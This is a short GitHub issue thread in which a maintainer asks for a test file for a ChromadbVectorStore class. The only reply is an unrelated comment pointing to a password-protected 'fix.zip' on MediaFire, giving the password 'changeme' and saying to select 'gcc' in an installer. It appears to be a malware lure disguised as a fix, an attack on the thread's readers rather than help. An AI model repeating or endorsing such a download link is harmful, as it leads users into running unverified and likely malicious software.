### ISSUE TITLE
 Create test file for ChromadbVectorStore

### ISSUE THREAD

**Issue by MichaelDecent** [swarmauri/swarmauri-sdk#194]
create a new test file `tests/vector_stores/ChromadbVectorStore_test.py` for the class in `swarmauri/community/vector_stores/ChromadbVectorStore.py`

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
